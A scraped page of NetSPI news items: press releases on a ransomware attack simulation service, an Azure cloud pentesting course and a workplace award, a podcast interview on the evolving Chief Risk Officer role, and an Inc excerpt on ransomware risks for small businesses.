Read the full article here: https://www.bizjournals.com/twincities/inno/stories/inno-on-fire/2021/06/18/meet-minne-innos-2021.html

Back

Improve Ransomware Attack Resiliency with NetSPI’s New Ransomware Attack Simulation

Through the tech-enabled service, organizations can put their ransomware prevention and detection capabilities to the test.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new ransomware attack simulation service. In collaboration with its ransomware security experts, the new service enables organizations to emulate real world ransomware families to find and fix critical vulnerabilities in their cybersecurity defenses.

Recent ransomware attacks have exposed major cybersecurity gaps globally. In the U.S., the Biden administration is urging business leaders to take immediate steps to prepare for ransomware attacks. In a recent memo, deputy national security advisor for cyber and emerging technology Anne Neuberger recommends organizations, “use a third-party pentester to test the security of your systems and your ability to defend against a sophisticated [ransomware] attack.”

“Paying a ransom doesn’t guarantee your data is returned safely, yet, one in four companies worldwide pay the adversariesI,” said Scott Sutherland, Practice Director at NetSPI. “Organizations must get more proactive with their security efforts to avoid paying the ransom and funding the cybercriminals. Ransomware families are both opportunistic and targeted – and no industry is exempt from falling victim to an attack.”

“NetSPI is eager to help organizations achieve a more scalable and continuous assessment of their environment from the perspective of an adversary,” said Charles Horton, COO at NetSPI. “The addition of the ransomware attack simulation service to our adversary simulation solutions will further help organizations strengthen their defenses and become more resilient against ransomware attacks.”

During a ransomware attack simulation engagement, NetSPI closely collaborates with organizations to simulate sophisticated ransomware tactics, techniques, and procedures (TTPs) using its custom-built breach and attack simulation technology. Following each engagement, organizations gain access to NetSPI’s technology to run custom plays on their own and continuously evaluate how well their cybersecurity program will hold up to a ransomware attack.

Learn more about NetSPI’s ransomware attack simulation online here and download The Ultimate Guide to Ransomware Attacks for insights on how to prevent and respond to a ransomware attack.

The Ultimate Guide to Ransomware Attacks – Download Now

SonicWall 2021 Cyber Threat Report; https://www.sonicwall.com/2021-cyber-threat-report/

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Back

NetSPI Named a 2021 Top Workplace in Minnesota

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the Top Workplaces in Minnesota by the Star Tribune. Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions measuring engagement, organizational health, and satisfaction. 

“NetSPI wouldn’t be what it is today without its employees and the culture of innovation that we’ve built,” said NetSPI President and CEO Aaron Shilts. “Even during a turbulent 2020, we had an employee retention rate of 92% which alone speaks volumes in an industry that has zero percent unemployment. I thank each and every member of our team for helping to make NetSPI a Top Workplace.”

The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from over 76,000 employees at Minnesota public, private and nonprofit organizations. 

NetSPI is hiring—apply today!

“We are especially proud of the fact that our employees called out NetSPI’s top strengths as interdepartmental cooperation, execution, and innovation. This award shows how well our teams work together, which is a key to our success,” said NetSPI Director of People Operations Heather Neumeister. “Seeing the variety of responses throughout the survey really validates the culture we have at NetSPI. Working with great people, doing important work, and having fun came through in many of the comments provided.”

This Top Workplace recognition follows an especially successful 12 months for NetSPI. Recently, NetSPI announced it raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. In 2020, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. NetSPI also launched Penetration Testing as a Service (PTaaS) in 2020, powered by its Resolve™ platform. 2021 also promises more business opportunities for NetSPI with upcoming additions of risk scoring, vulnerability intelligence, ransomwareattack simulation, and more.

To qualify for the Star Tribune Top Workplaces, a company must have more than 50 employees in Minnesota. Nearly 3,000 companies were invited to participate. Rankings were composite scores calculated purely on the basis of employee responses.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Media Contacts:
Elyse Bauchle, Maccabee PR for NetSPI
elyse@maccabee.com
(612) 294-3125

Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Back

The Evolution of the Chief Risk Officer

It is amazing how much the cybersecurity industry has grown and evolved over the years. If you just look back even just a couple of years, the strategic conversations we were having have certainly changed. The space is evolving, and each of us in the industry are having to evolve with it to stay current. One area that has evolved greatly over time is risk management, specifically the role of the Chief Risk Officer.

To dig deeper on its evolution, I sat down with CEO and founder of Risk Neutral Jeff Sauntry on the Agent of Influence podcast, a series of interviews with industry leaders and security gurus where we share best practices and trends in the world of cybersecurity and vulnerability management. Read on for highlights from our conversation around risk management, the role of the Chief Risk Officer, and more.

Nabil: Let’s start by talking about risk management. How did you make that transition from cybersecurity to risk management?

Jeff: For me, it was a natural evolution to upskill my vocabulary as I started interacting with more senior business leaders and board members. When the board members and the C-suite have normal discussions, they’re still discussing challenges and opportunities, but they’re speaking in terms of risk, cost, and outcomes. In cybersecurity, we’re often discussing threats and consequences. Something was getting lost in translation, so I decided to build on my strong technical and cybersecurity background and dig into risk management and the ability to become a more effective communicator.

Nabil: What would you say are some of the key characteristics that make someone great at risk management?

Jeff: My whole career had risk management components to it, but I did not yet understand risk as an empirical domain. That’s one of the reasons I chose to make this pivot. I also made the investment of time and resources to go to Carnegie Mellon and get my Chief Risk Officer certification. What was great about that is I went from being very myopic, maybe talking about technology, operational, or compliance risk, and then opening my eyes to the fact that there are five major risk categories that every business has to worry about: Strategic risk – which is by far the most important if you don’t get that one right, nothing else matters – then operational, finance, compliance, and then reputational risk comes into play if any of the first four fail.

Nabil: Tell me more about your experience at Carnegie Mellon.

Jeff: Most of us in cybersecurity are very familiar with some of the great work Carnegie Mellon has done with the maturity model of Capability Maturity Model Integration (CMMI), the insider threat program, and they have been a great partner with the government in terms of coming up with funded cybersecurity programs. I was familiar with the quality of the Carnegie Mellon products and insights, and when I read the curriculum, I thought to myself, “this is going to be really awesome.” One thing I wanted to avoid was that I didn’t want the course to be comprised of completely fintech leaders. For a lot of people fintech and financial services firms lead the way in terms of Chief Risk Officers and managing risk from a quantifiable perspective. But I knew the risk domain was much bigger and I wanted to be a well-rounded risk professional. Having a very broad group of peers in my cohort really helped me as well as the caliber of instructors that they brought in that could talk about the different ways to look at risk. I feel that I can now talk about enterprise risk management programs and not have such a myopic view around cybersecurity-, technology-, or compliance-related risk.

Nabil: Do you think the way organizations approach cybersecurity risk today needs to evolve?

Jeff: One hundred percent! It’s one of those things that you’re embarrassed about because you’ve been part of the problem for so long. We have to take a hard look in the mirror. I’ve looked back at some of the conversations I’ve had and they’re almost cringeworthy. Given the knowledge I have gained in the last two years about risk management, I wish I could go back and redo conversations with certain clients. 

Nabil: From your experience, how has the role of the Chief Risk Officer evolved?

Jeff: A big part of this evolution is the cybersecurity profession. In general, cybersecurity is very focused on technical skills. That’s naturally how a lot of us come up through our profession and education. But, it’s even more important to understand that if you can’t explain the outcome of your results or your findings, it’s not going to resonate with clients. It’s as if you never did a security engagement if you can’t get the message or the impact across. That’s where I think the risk management professional is evolving. Improving soft skills that so that cybersecurity risk can have a seat at the table rather than someone coming in to tell them that the sky is falling. The Chief Risk Officer has to be a true peer to the rest of the C-suite, they should even have a solid line into the board of directors. Most companies should think about having a dedicated Risk Management Committee at the management level that’s complemented by one at the board level so that risk gets the right amount of time and attention. Then, you’ll have people with the right skill set in the room having the right discussions. 

One of the important things that came out the financial services industry is that they found if you embed risk managers structurally within each business unit there to please their boss and rubber stamp high risk decisions, it can end badly. This is part of what got us into the problem of the big financial meltdown in 2008/2009. It should have been a canary in the coal mine moment for risk management as a profession to say, “you have to be very careful about allowing the Chief Risk Officer to operate independently.” They need the right reporting structures and shouldn’t be allowed to be fired on a whim because they raised their hand and said, “I think this is a little too risky for us.” So, I think the evolution of the chief risk officer is at a very exciting point in time right now.

Nabil: Let’s talk a little bit about your advisory board work. Do you have any advice for others who are looking to work in that capacity?

Jeff: You need to be very pragmatic, just like you would plan your secondary education and your master’s degree in your career. From a board journey perspective, it’s very much the same thing. You should start with an organization that you’re passionate about in order to understand: What are the procedures? What are the roles that are played? What are the different committees? Then, as you decide that you want to pursue service on a private board or a public board, think about the additional skill sets that you may need related to your fiduciary responsibilities and insurance and what are some of the personal and professional liabilities. Set a game plan for yourself, make some investments of time and money, and really figure out what it takes to be a board professional. I think it’s very worthwhile. People with a strong technical and cybersecurity background definitely have something to contribute to advisory boards from a cognitive diversity perspective as organizations face digital transformations and threats from a wider range of actors each year.

Nabil: You are a scuba instructor and a captain of the US Merchant Marines. What parallels do you draw between being a scuba instructor or captain and risk management?

Jeff: All of us have something to learn from an environmental, social, and governance perspective. One of the reasons I’m a merchant marine captain is that people covet what they know. I thought it was extremely important to get people under the water and really understand things like what plastics are doing to our oceans to understand that, yes, the stuff you throw out your car actually does make it into environments that we care about.

Everything related to instructing scuba is about risk management. The standards they have for teaching, how many students you can have per instructor, the burden being on the instructor to determine whether it’s safe to do certain things, the insurance I have to carry – all that stuff is designed to minimize risk to the students and staff. It’s incredible how they handle violations of policy. There’s a professional journal and if somebody does something wrong, they put it out there for everyone to learn from. 

The reality is when you take those people out onto the ocean and you’re responsible for them, you need to bring them back healthy and safe. This comes down to a couple thing: What experiences do I bring to those situations based on the training I’ve had on the water? What is the quality of the vessel and the equipment that I’m relying on to help me deal with those situations? How prepared am I for this situation? And those are the three things as a captain that you can control.  

Those core concepts resonate with cybersecurity well. How prepared are you to do the job you’ve been asked to do as part of a team? How well have you prepared your organization to deal with a specific threat? That prudent mindset of being a good steward for the people you’re responsible for resonates with people in cybersecurity as well.

Agent of Influence - Episode 026 - The Evolution of Risk Management and the Chief Risk Officer - Jeff Sauntry
Back

Azure Cloud Pentesting Added to NetSPI’s Roster of Cybersecurity Training Courses

The new training course provides a deep dive on the attack surface introduced by Azure and how to exploit its vulnerabilities.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Dark Side Ops (DSO) 3: Azure Cloud Pentesting, a new cybersecurity training course focused on Azure cloud penetration testing. Participants will gain a better understanding of potential risks associated with Azure cloud deployments, how to exploit them, and how to prevent and remediate critical cloud vulnerabilities.

As experts anticipateI cloud adoption to soar in the aftermath of the COVID-19 pandemic, this course helps cybersecurity, DevOps, and IT professionals better grasp the complexities that accompany Microsoft’s Azure cloud platform. The first public DSO 3: Azure Cloud Pentesting training is scheduled for August 23-24, 2021 and will be conducted virtually. The two-day training session costs $2,000/person.

“It’s no surprise that cloud security was listed as the most important skill needed to pursue a cybersecurity career in the latest (ISC)Cybersecurity Workforce StudyII,” said Aaron Shilts, President and CEO at NetSPI. “An emphasis on cloud security education and training is critical as the attack surface grows.”

“Not only does DSO 3: Azure Cloud Pentesting feature a live cloud environment and real-world examples from our extensive cloud penetration testing work, it is also designed and instructed by NetSPI practice director Karl Fosaaen, one of the foremost experts on Azure penetration testing,” Shilts added.

“Traditional network penetration testing processes need to be updated to account for the intricacies introduced by cloud infrastructure,” said Karl Fosaaen, Cloud Practice Director at NetSPI. “Through the training, I’m eager to teach others how level up their on-premise penetration testing skills and apply them to Azure cloud.”

NetSPI’s Dark Side Ops trainings, DSO 1: Malware DevDSO 2: Adversary Simulation, and DSO 3: Azure Cloud Pentesting are available as private trainings, upon request. Contact NetSPI for more information regarding private group training sessions.

For additional training details and course requirements, visit the NetSPI website. Registration is now open for all August 2021 DSO cybersecurity training courses.

Dark Side Ops 3: Azure Cloud Pentesting virtual course on August 23–24, 2021 (9AM to 5PM CT)

Gartner Newsroom; November 17, 2020; https://www.gartner.com/en/newsroom/press-releases/2020-11-17-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-grow-18-percent-in-2021
II (ISC)2 Cybersecurity Workforce Study 2020; https://www.isc2.org/Research/Workforce-Study

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Back

Inc: 6 Things Every Small Business Needs to Know About Ransomware Attacks

On June 25, 2021, NetSPI Chief Operating Officer Charles Horton was featured in an Inc article:

 

It’s tempting to think the average cyber extortionist has bigger fish to fry than your small business. Last month alone, hackers targeted the largest petroleum pipeline in the United States, Ireland’s national health service, the city of Gary, Indiana, and numerous other big targets.

But while they may receive less attention, 50 to 70 percent of ransomware attacks are aimed at small and medium-sized companies, Secretary of Homeland Security Alejandro Mayorkas said during a U.S. Chamber of Commerce event in May. And changes in business practices, accelerated by the pandemic, have left small businesses even more vulnerable.

In ransomware attacks, cyber criminals use malware to take over and encrypt a victim’s files and data, effectively holding the data hostage until they’re paid to release it. The recent surge in remote work was a golden opportunity for hackers, who took advantage of out-of-date VPNs and unsecured home networks.

The consequences of a ransomware attack on a small company aren’t as wide-ranging as those on a hospital or a public utility, but the result for the victim can be more crippling. An estimated 60 percent of small businesses fail within six months of an attack, according to the National Cyber Security Alliance. For the companies that do recover, repeat ransomware attacks are increasingly common: Roughly 80 percent of victims are hit a second time, according to a report from Boston-based cybersecurity firm Cybereason.

Small businesses are attractive targets because they typically lack the budget and resources to prevent, identify, respond to, and recover from threats. There are, however, some simple methods that can help, says Charles Horton, chief operating officer of cybersecurity firm NetSPI. Here are a few things he and other experts say you should know about ransomware.

 

To learn more, read the full article here: https://www.inc.com/amrita-khalid/ransomware-hackers-crime-cybersecurity-tips.html

 

Discover why security operations teams choose NetSPI.

X